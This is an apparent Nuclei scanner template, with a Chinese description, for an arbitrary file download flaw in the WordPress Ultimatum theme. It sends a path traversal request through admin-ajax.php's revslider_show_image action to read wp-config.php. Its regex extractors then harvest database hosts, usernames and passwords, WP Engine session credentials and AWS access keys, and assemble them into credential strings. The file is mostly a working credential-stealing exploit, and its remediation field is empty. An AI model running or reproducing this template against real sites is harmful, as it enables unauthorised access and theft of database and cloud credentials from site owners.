id: Wordpress-Ultimatum_Themes-FileDownload
info:
  name: wordpress Ultimatum Theme_1.x_任意文件下载
  author:
  - l0ne1y
  description: |-
    WordPress Theme Ultimatum 1.x 任意文件下载漏洞
    WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。

    WordPress Theme Ultimatum 1.x存在任意文件下载漏洞。攻击者可利用漏洞下载任意文件。
  severity: high
  remediation: |-
    官方修复方案：
  tags: wordpress,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        condition: or
  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"             

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])

      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'